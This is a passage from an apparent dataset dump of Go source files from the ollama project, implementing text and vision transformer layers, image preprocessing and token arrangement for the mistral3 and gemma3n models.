`gguf:"ffn_norm"` MLP *TextMLP } func (d *TextSelfAttentionDecoderLayer) Forward(ctx ml.Context, hiddenState, positions, outputs, _, _ ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor { residual := hiddenState hiddenState = d.AttentionNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = d.SelfAttention.Forward(ctx, hiddenState, positions, cache, opts) // In the final layer (outputs != nil), optimize by pruning to just the token positions // we need logits for. if outputs != nil { hiddenState = hiddenState.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = d.MLPNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = d.MLP.Forward(ctx, hiddenState, opts) return hiddenState.Add(ctx, residual) } type TextCrossAttention struct { QueryNorm *nn.RMSNorm `gguf:"cross_attn_q_norm"` Query *nn.Linear `gguf:"cross_attn_q_proj"` KeyNorm *nn.RMSNorm `gguf:"cross_attn_k_norm"` Key *nn.Linear `gguf:"cross_attn_k_proj"` Value *nn.Linear `gguf:"cross_attn_v_proj"` Output *nn.Linear `gguf:"cross_attn_o_proj"` } func (ca *TextCrossAttention) Forward(ctx ml.Context, hiddenState, crossAttentionStates ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor { batchSize := hiddenState.Dim(1) headDim := opts.hiddenSize / opts.numHeads query := ca.Query.Forward(ctx, hiddenState) query = query.Reshape(ctx, headDim, opts.numHeads, batchSize) query = ca.QueryNorm.Forward(ctx, query, opts.eps) var key, value ml.Tensor if crossAttentionStates != nil { numVisionTokens, numTiles := crossAttentionStates.Dim(1), crossAttentionStates.Dim(2) key = ca.Key.Forward(ctx, crossAttentionStates) key = key.Reshape(ctx, headDim, opts.numKVHeads, numVisionTokens*numTiles) key = ca.KeyNorm.Forward(ctx, key, opts.eps) value = ca.Value.Forward(ctx, crossAttentionStates) value = value.Reshape(ctx, headDim, opts.numKVHeads, numVisionTokens*numTiles) cache.Put(ctx, key, value) } key, value, _ = cache.Get(ctx) scaleFactor := 1.0 / math.Sqrt(float64(headDim)) query = query.Permute(ctx, 0, 2, 1, 3) key = key.Permute(ctx, 0, 2, 1, 3) value = value.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) kq := key.MulmatFullPrec(ctx, query) kq = kq.Scale(ctx, scaleFactor) kq = kq.Softmax(ctx) kqv := value.Mulmat(ctx, kq) attention := kqv.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) attention = attention.Reshape(ctx, opts.hiddenSize, batchSize) return ca.Output.Forward(ctx, attention) } type TextCrossAttentionDecoderLayer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` CrossAttention *TextCrossAttention AttentionGate ml.Tensor `gguf:"cross_attn_attn_gate"` MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *TextMLP MLPGate ml.Tensor `gguf:"cross_attn_mlp_gate"` } func (d *TextCrossAttentionDecoderLayer) Forward(ctx ml.Context, hiddenState, _, _, crossAttentionStates, crossAttentionMask ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor { residual := hiddenState hiddenState = d.AttentionNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = d.CrossAttention.Forward(ctx, hiddenState, crossAttentionStates, cache, opts) hiddenState = hiddenState.Mul(ctx, d.AttentionGate.Tanh(ctx)) hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = d.MLPNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = d.MLP.Forward(ctx, hiddenState, opts) hiddenState = hiddenState.Mul(ctx, d.MLPGate.Tanh(ctx)) return hiddenState.Add(ctx, residual) } type TextDecoderLayer interface { Forward(ctx ml.Context, hiddenState, positionIDs, outputs, crossAttentionStates, crossAttentionMask ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor } type TextDecoder struct { Layers []TextDecoderLayer } func (d *TextDecoder) Forward(ctx ml.Context, hiddenState, positionIDs, outputs, crossAttentionStates, crossAttentionMask ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor { for i, layer := range d.Layers { layerType := selfAttentionLayer if slices.Contains(opts.crossAttentionLayers, int32(i)) { layerType = crossAttentionLayer } cache.SetLayer(i) cache.SetLayerType(layerType) if layerType == selfAttentionLayer || crossAttentionStates != nil || cache.UnderlyingCache().(*kvcache.EncoderCache).EncoderCached() { var lastLayerOutputs ml.Tensor if i == len(d.Layers)-1 { lastLayerOutputs = outputs } hiddenState = layer.Forward(ctx, hiddenState, positionIDs, lastLayerOutputs, crossAttentionStates, crossAttentionMask, cache, opts) } } return hiddenState } type TextModelOptions struct { hiddenSize, numHeads, numKVHeads int ropeDim int eps, ropeBase, ropeScale float32 crossAttentionLayers []int32 } func (o TextModelOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions, factors ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.ropeDim, o.ropeBase, 1./o.ropeScale, rope.WithFactors(factors)) } type TextModel struct { TokenEmbedding *nn.Embedding `gguf:"token_embd"` Transformer *TextDecoder `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output"` *TextModelOptions } func (m *TextModel) Forward(ctx ml.Context, inputIDs, positionIDs, outputs, crossAttentionStates, crossAttentionMask ml.Tensor, cache *kvcache.WrapperCache) ml.Tensor { hiddenState := m.TokenEmbedding.Forward(ctx, inputIDs) hiddenState = m.Transformer.Forward(ctx, hiddenState, positionIDs, outputs, crossAttentionStates, crossAttentionMask, cache, m.TextModelOptions) hiddenState = m.OutputNorm.Forward(ctx, hiddenState, m.eps) return m.Output.Forward(ctx, hiddenState) } func newTextModel(c fs.Config) *TextModel { var decoderLayers []TextDecoderLayer for i := range c.Uint("block_count") { var textDecoderLayer TextDecoderLayer if slices.Contains(c.Ints("attention.cross_attention_layers"), int32(i)) { textDecoderLayer = &TextCrossAttentionDecoderLayer{} } else { textDecoderLayer = &TextSelfAttentionDecoderLayer{} } decoderLayers = append(decoderLayers, textDecoderLayer) } return &TextModel{ Transformer: &TextDecoder{Layers: decoderLayers}, TextModelOptions: &TextModelOptions{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), ropeDim: int(c.Uint("rope.dimension_count")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1), crossAttentionLayers: c.Ints("attention.cross_attention_layers"), }, } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mistral3/imageproc.go
model/models/mistral3/imageproc.go
package mistral3 import ( "image" _ "image/jpeg" _ "image/png" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/model/imageproc" ) type ImageProcessor struct { imageSize int patchSize int numChannels int longestEdge int } func newImageProcessor(c fs.Config) ImageProcessor { return ImageProcessor{ imageSize: int(c.Uint("vision.image_size", 1540)), patchSize: int(c.Uint("vision.patch_size", 14)), numChannels: int(c.Uint("vision.num_channels", 3)), longestEdge: int(c.Uint("vision.longest_edge", 1540)), } } // ProcessImage prepares an image for the vision model by: // 1. Compositing transparent images // 2. Resizing to fit model constraints while preserving aspect ratio // 3. Normalizing pixel values // Returns normalized image data and the final size in pixels func (p *ImageProcessor) ProcessImage(img image.Image) ([]float32, image.Point, error) { img = imageproc.Composite(img) size := img.Bounds().Size() ratio := max(float64(size.Y)/float64(p.longestEdge), float64(size.X)/float64(p.longestEdge)) if ratio > 1.0 { size = image.Point{ int(math.Floor(float64(size.X) / ratio)), int(math.Floor(float64(size.Y) / ratio)), } } patchesX := (size.X-1)/p.patchSize + 1 patchesY := (size.Y-1)/p.patchSize + 1 size = image.Point{ patchesX * p.patchSize, patchesY * p.patchSize, } img = imageproc.Resize(img, size, imageproc.ResizeBilinear) data := imageproc.Normalize(img, imageproc.ClipDefaultMean, imageproc.ClipDefaultSTD, true, true) return data, size, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mistral3/model.go
model/models/mistral3/model.go
package mistral3 import ( "bytes" "image" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.BytePairEncoding *TextModel *VisionModel `gguf:"v"` *MultiModalProjector `gguf:"mm"` ImageProcessor } // Implement MultimodalProcessor interface var _ model.MultimodalProcessor = (*Model)(nil) // Implement TextProcessor interface var _ model.TextProcessor = (*Model)(nil) func New(c fs.Config) (model.Model, error) { m := &Model{ BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, `[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]*[\p{Ll}\p{Lm}\p{Lo}\p{M}]+|[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]+[\p{Ll}\p{Lm}\p{Lo}\p{M}]*|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n/]*|\s*[\r\n]+|\s+(?!\S)|\s+`, ), TextModel: newTextModel(c), VisionModel: newVisionModel(c), ImageProcessor: newImageProcessor(c), MultiModalProjector: newMultiModalProjector(c), } m.Cache = kvcache.NewCausalCache(m.TextModel.Shift) return m, nil } type PatchMerger struct { MergingLayer *nn.Linear `gguf:"merging_layer"` } func (pm *PatchMerger) Forward(ctx ml.Context, visionOutputs ml.Tensor, size image.Point, spatialMergeSize int) ml.Tensor { d := visionOutputs.Dim(0) imageGrid := visionOutputs.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx).Reshape(ctx, size.X, size.Y, d) kernel := ctx.Input().Empty(ml.DTypeF32, spatialMergeSize, spatialMergeSize, d) patches := kernel.IM2Col(ctx, imageGrid, spatialMergeSize, spatialMergeSize, 0, 0, 1, 1) reshaped := patches.Reshape(ctx, d*spatialMergeSize*spatialMergeSize, patches.Dim(1)*patches.Dim(2)) return pm.MergingLayer.Forward(ctx, reshaped) } type MultiModalProjector struct { Norm *nn.RMSNorm `gguf:"norm"` Linear1 *nn.Linear `gguf:"linear_1"` Linear2 *nn.Linear `gguf:"linear_2"` PatchMerger *PatchMerger `gguf:"patch_merger"` spatialMergeSize int eps float32 patchSize int } func (p *MultiModalProjector) Forward(ctx ml.Context, visionOutputs ml.Tensor, size image.Point) (ml.Tensor, image.Point) { visionOutputs = p.Norm.Forward(ctx, visionOutputs, p.eps) patchSizes := image.Point{size.X / p.patchSize, size.Y / p.patchSize} visionOutputs = p.PatchMerger.Forward(ctx, visionOutputs, patchSizes, p.spatialMergeSize) visionOutputs = p.Linear1.Forward(ctx, visionOutputs) visionOutputs = visionOutputs.GELU(ctx) return p.Linear2.Forward(ctx, visionOutputs), image.Point{patchSizes.X / p.spatialMergeSize, patchSizes.Y / p.spatialMergeSize} } func newMultiModalProjector(c fs.Config) *MultiModalProjector { return &MultiModalProjector{ spatialMergeSize: int(c.Uint("spatial_merge_size", 2)), eps: c.Float("text_config.rms_norm_eps", 1e-5), patchSize: int(c.Uint("vision.patch_size", 14)), } } func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) { if len(m.VisionModel.Layers) == 0 { return nil, model.ErrNoVisionModel } image, _, err := image.Decode(bytes.NewReader(multimodalData)) if err != nil { return nil, err } f32s, size, err := m.ImageProcessor.ProcessImage(image) if err != nil { return nil, err } pixelValues := ctx.Input().FromFloats(f32s, size.X, size.Y, m.ImageProcessor.numChannels) visionOutputs := m.VisionModel.Forward(ctx, pixelValues) features, size := m.MultiModalProjector.Forward(ctx, visionOutputs, size) // split into patches to be sent to the text transformer rows := make([]input.Multimodal, size.Y) for i := range rows { rows[i].Tensor = features.View(ctx, features.Stride(1)*size.X*i, features.Dim(0), features.Stride(1), size.X) } return rows, nil } // PostTokenize arranges Mistral 3's inputs for the forward pass // In Mistral 3 and Pixtral, the input patches are arranged as follows: // [IMG]...[IMG][IMG_BREAK][IMG]...[IMG][IMG_BREAK][IMG]...[IMG][IMG_END] // Each sequence of [IMG]...[IMG] is a set of patches of vision embeddings // that can be processed together. func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) { var result []*input.Input for _, inp := range inputs { if len(inp.Multimodal) == 0 { result = append(result, inp) } else { for i, row := range inp.Multimodal { // [IMG] result = append(result, &input.Input{Token: 10, Multimodal: []input.Multimodal{{Tensor: row.Tensor}}, MultimodalHash: inp.MultimodalHash, SameBatch: row.Tensor.Dim(1)}) result = append(result, slices.Repeat([]*input.Input{{Token: 10}}, row.Tensor.Dim(1)-1)...) if i == len(inp.Multimodal)-1 { // [IMG_END] result = append(result, &input.Input{Token: 13}) } else { // [IMG_BREAK] result = append(result, &input.Input{Token: 12}) } } } } return result, nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) positionsScale := m.getScale(ctx, batch.Positions) return m.TextModel.Forward(ctx, batch.Inputs, positions, positionsScale, batch.Outputs, batch, m.Cache), nil } func init() { model.Register("mistral3", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mistral3/model_vision.go
model/models/mistral3/model_vision.go
package mistral3 import ( "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" ) var batchSize int = 1 func rotateHalf(ctx ml.Context, t ml.Tensor) ml.Tensor { x1 := t.Slice(ctx, 0, 0, t.Dim(0)/2, 1) x2 := t.Slice(ctx, 0, t.Dim(0)/2, t.Dim(0), 1).Contiguous(ctx) return x2.Scale(ctx, -1).Concat(ctx, x1, 0) } func applyRotaryPositionEmbeddings(ctx ml.Context, states, cos, sin ml.Tensor) ml.Tensor { return states.Mul(ctx, cos).Add(ctx, rotateHalf(ctx, states).Mul(ctx, sin)) } type VisionSelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *VisionSelfAttention) Forward(ctx ml.Context, hiddenStates, cos, sin ml.Tensor, opts *VisionModelOptions) ml.Tensor { query := sa.Query.Forward(ctx, hiddenStates) key := sa.Key.Forward(ctx, hiddenStates) value := sa.Value.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim, opts.numHeads, query.Dim(1), batchSize) key = key.Reshape(ctx, opts.headDim, opts.numHeads, key.Dim(1), batchSize) value = value.Reshape(ctx, opts.headDim, opts.numHeads, value.Dim(1), batchSize) query = applyRotaryPositionEmbeddings(ctx, query, cos, sin) key = applyRotaryPositionEmbeddings(ctx, key, cos, sin) attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(opts.headDim)), nil) attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2), batchSize) return sa.Output.Forward(ctx, attention) } type VisionMLP struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *VisionModelOptions) ml.Tensor { hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hiddenStates) } type VisionEncoderLayer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` SelfAttention *VisionSelfAttention FFNNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *VisionMLP } func (e *VisionEncoderLayer) Forward(ctx ml.Context, hiddenStates, cos, sin ml.Tensor, opts *VisionModelOptions) ml.Tensor { residual := hiddenStates hiddenStates = e.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = e.SelfAttention.Forward(ctx, hiddenStates, cos, sin, opts) hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = e.FFNNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = e.MLP.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } type VisionModelOptions struct { hiddenSize int numHeads int headDim int intermediateSize int imageSize int patchSize int numChannels int eps float32 ropeBase float32 } type VisionModel struct { PatchEmbedding *nn.Conv2D `gguf:"patch_conv"` EncoderNorm *nn.RMSNorm `gguf:"encoder_norm"` Layers []VisionEncoderLayer `gguf:"blk"` *VisionModelOptions } func (m *VisionModel) positionalEmbedding(ctx ml.Context, positionIDs ml.Tensor) ml.Tensor { maxPatchesPerSide := m.imageSize / m.patchSize frequencies := m.headDim / 2 frequenciesHeight := make([]float32, frequencies/2*maxPatchesPerSide) frequenciesWidth := make([]float32, frequencies/2*maxPatchesPerSide) for i := range frequencies { for j := range maxPatchesPerSide { frequency := float32(j) / float32(math.Pow(float64(m.ropeBase), float64(i)*2/float64(m.headDim))) if i%2 == 0 { frequenciesHeight[i/2*maxPatchesPerSide+j] = frequency } else { frequenciesWidth[i/2*maxPatchesPerSide+j] = frequency } } } h := ctx.Input().FromFloats(frequenciesHeight, maxPatchesPerSide, frequencies/2) w := ctx.Input().FromFloats(frequenciesWidth, maxPatchesPerSide, frequencies/2) h = h.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) w = w.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) h = h.Repeat(ctx, 1, maxPatchesPerSide) h = h.Reshape(ctx, frequencies/2, maxPatchesPerSide, maxPatchesPerSide).Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) w = w.Repeat(ctx, 2, maxPatchesPerSide) inverseFrequencies := h.Concat(ctx, w, 0).Reshape(ctx, frequencies, maxPatchesPerSide*maxPatchesPerSide) inverseFrequencies = inverseFrequencies.Concat(ctx, inverseFrequencies, 0) return inverseFrequencies.Rows(ctx, positionIDs) } func (m *VisionModel) Forward(ctx ml.Context, pixelValues ml.Tensor) ml.Tensor { numPatchesW := pixelValues.Dim(0) / m.patchSize numPatchesH := pixelValues.Dim(1) / m.patchSize numPatches := numPatchesW * numPatchesH hiddenStates := m.PatchEmbedding.Forward(ctx, pixelValues, m.patchSize, m.patchSize, 0, 0, 1, 1) hiddenStates = hiddenStates.Reshape(ctx, numPatches, m.hiddenSize) hiddenStates = hiddenStates.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) hiddenStates = m.EncoderNorm.Forward(ctx, hiddenStates, m.VisionModelOptions.eps) // Prepare position IDs for 2D rope positions := make([]int32, numPatches) for h := range numPatchesH { for w := range numPatchesW { idx := h*numPatchesW + w positions[idx] = int32(h*m.imageSize/m.patchSize + w) } } positionIDs := ctx.Input().FromInts(positions, len(positions)) positionEmbedding := m.positionalEmbedding(ctx, positionIDs) cos, sin := positionEmbedding.Cos(ctx), positionEmbedding.Sin(ctx) cos = cos.Reshape(ctx, cos.Dim(0), 1, cos.Dim(1)) sin = sin.Reshape(ctx, sin.Dim(0), 1, sin.Dim(1)) for _, layer := range m.Layers { hiddenStates = layer.Forward(ctx, hiddenStates, cos, sin, m.VisionModelOptions) } return hiddenStates } func newVisionModel(c fs.Config) *VisionModel { return &VisionModel{ Layers: make([]VisionEncoderLayer, c.Uint("vision.block_count")), VisionModelOptions: &VisionModelOptions{ hiddenSize: int(c.Uint("vision.embedding_length", 1024)), numHeads: int(c.Uint("vision.attention.head_count", 16)), headDim: int(c.Uint("vision.attention.key_length", 64)), intermediateSize: int(c.Uint("vision.feed_forward_length", 4096)), imageSize: int(c.Uint("vision.image_size", 1540)), patchSize: int(c.Uint("vision.patch_size", 14)), numChannels: int(c.Uint("vision.num_channels", 3)), eps: c.Float("vision.attention.layer_norm_epsilon", 1e-5), ropeBase: c.Float("vision.rope.freq_base", 10000.0), }, } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mistral3/model_text.go
model/models/mistral3/model_text.go
package mistral3 import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model/input" ) type TextOptions struct { hiddenSize, numHeads, numKVHeads int headDim, ropeDim int eps, ropeBase, ropeScale float32 ropeOrigPosEmbeddings int ropeScalingBeta float32 ropeType string ropeExtrapolation float32 ropeBetaFast float32 ropeBetaSlow float32 ropeMscale float32 ropeMscaleAllDim float32 } func (o TextOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { var ropeOpts []func(*rope.Options) if o.ropeType == "yarn" { if o.ropeMscale != 0 && o.ropeMscaleAllDim != 0 { ropeOpts = append(ropeOpts, rope.WithAttentionFactor(1.0/float32(0.1*math.Log(float64(o.ropeScale))+1.0))) } ropeOpts = append(ropeOpts, rope.WithOriginalContextLength(o.ropeOrigPosEmbeddings), rope.WithExtrapolationFactor(o.ropeExtrapolation), rope.WithBetaFast(o.ropeBetaFast), rope.WithBetaSlow(o.ropeBetaSlow), ) } return nn.RoPE(ctx, states, positions, o.ropeDim, o.ropeBase, 1./o.ropeScale, ropeOpts...) } type TextModel struct { TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []Layer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` *TextOptions } type SelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *SelfAttention) Forward(ctx ml.Context, hiddenState, positionIDs, positionsScale ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor { batchSize := hiddenState.Dim(1) headDim := cmp.Or(opts.headDim, opts.hiddenSize/opts.numHeads) q := sa.Query.Forward(ctx, hiddenState) q = q.Reshape(ctx, headDim, opts.numHeads, batchSize) q = opts.applyRotaryPositionEmbeddings(ctx, q, positionIDs) k := sa.Key.Forward(ctx, hiddenState) k = k.Reshape(ctx, headDim, opts.numKVHeads, batchSize) k = opts.applyRotaryPositionEmbeddings(ctx, k, positionIDs) v := sa.Value.Forward(ctx, hiddenState) v = v.Reshape(ctx, headDim, opts.numKVHeads, batchSize) if opts.ropeOrigPosEmbeddings > 0 { q = q.Mul(ctx, positionsScale) } kqv := nn.Attention(ctx, q, k, v, 1.0/math.Sqrt(float64(headDim)), cache) kqv = kqv.Reshape(ctx, headDim*opts.numHeads, batchSize) return sa.Output.Forward(ctx, kqv) } func (m *TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil } type MLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` Gate *nn.Linear `gguf:"ffn_gate"` } func (mlp *MLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *TextOptions) ml.Tensor { hiddenState = mlp.Gate.Forward(ctx, hiddenState).SILU(ctx, mlp.Up.Forward(ctx, hiddenState)) return mlp.Down.Forward(ctx, hiddenState) } type Layer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` SelfAttention *SelfAttention MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *MLP } func (l *Layer) Forward(ctx ml.Context, hiddenState, positionIDs, positionsScale, outputs ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor { residual := hiddenState hiddenState = l.AttentionNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.SelfAttention.Forward(ctx, hiddenState, positionIDs, positionsScale, cache, opts) // In the final layer (outputs != nil), optimize by pruning to just the token positions // we need logits for. if outputs != nil { hiddenState = hiddenState.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = l.MLPNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.MLP.Forward(ctx, hiddenState, opts) return hiddenState.Add(ctx, residual) } func (m *TextModel) Forward(ctx ml.Context, inputs, positions, positionsScale, outputs ml.Tensor, batch input.Batch, cache kvcache.Cache) ml.Tensor { hiddenState := m.TokenEmbedding.Forward(ctx, inputs).Duplicate(ctx) // image embeddings for _, image := range batch.Multimodal { imageFeature := image.Multimodal[0].Tensor ctx.Forward(imageFeature.Copy(ctx, hiddenState.View(ctx, image.Index*hiddenState.Stride(1), imageFeature.Dim(0)*imageFeature.Dim(1)))) } for i, layer := range m.Layers { cache.SetLayer(i) var lastLayerOutputs ml.Tensor if i == len(m.Layers)-1 { lastLayerOutputs = outputs } hiddenState = layer.Forward(ctx, hiddenState, positions, positionsScale, lastLayerOutputs, cache, m.TextOptions) } hiddenState = m.OutputNorm.Forward(ctx, hiddenState, m.eps) return m.Output.Forward(ctx, hiddenState) } func (m *TextModel) getScale(ctx ml.Context, positions []int32) ml.Tensor { posScale := make([]float32, len(positions)) for n, pos := range positions { interval := math.Floor(float64(pos) / float64(m.ropeOrigPosEmbeddings)) posScale[n] = float32(1.0 + float64(m.ropeScalingBeta)*math.Log(1.0+interval)) } return ctx.Input().FromFloats(posScale, 1, 1, len(posScale)) } func newTextModel(c fs.Config) *TextModel { return &TextModel{ Layers: make([]Layer, c.Uint("block_count")), TextOptions: &TextOptions{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), headDim: int(c.Uint("attention.key_length")), ropeDim: int(c.Uint("rope.dimension_count")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1.0), ropeOrigPosEmbeddings: int(c.Uint("rope.scaling.original_context_length")), ropeScalingBeta: c.Float("rope.scaling_beta", 0.1), ropeBetaFast: c.Float("rope.scaling.beta_fast", 32.0), ropeBetaSlow: c.Float("rope.scaling.beta_slow", 1.0), ropeType: c.String("rope.scaling.type"), ropeMscale: c.Float("rope.scaling.mscale"), ropeMscaleAllDim: c.Float("rope.scaling.mscale_all_dim"), ropeExtrapolation: c.Float("rope.scaling.extrapolation_factor", 1), }, } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3n/model.go
model/models/gemma3n/model.go
package gemma3n import ( "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.SentencePiece *TextModel } // Forward implements model.Model. func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { return m.TextModel.Forward(ctx, batch, m.Cache) } func New(c fs.Config) (model.Model, error) { m := Model{ TextModel: newTextModel(c), SentencePiece: model.NewSentencePiece( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, ), } m.Cache = kvcache.NewWrapperCache( kvcache.NewCausalCache(m.Shift), kvcache.NewSWACache(int32(c.Uint("attention.sliding_window")), m.Shift), ) return &m, nil } func init() { model.Register("gemma3n", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3n/model_text.go
model/models/gemma3n/model_text.go
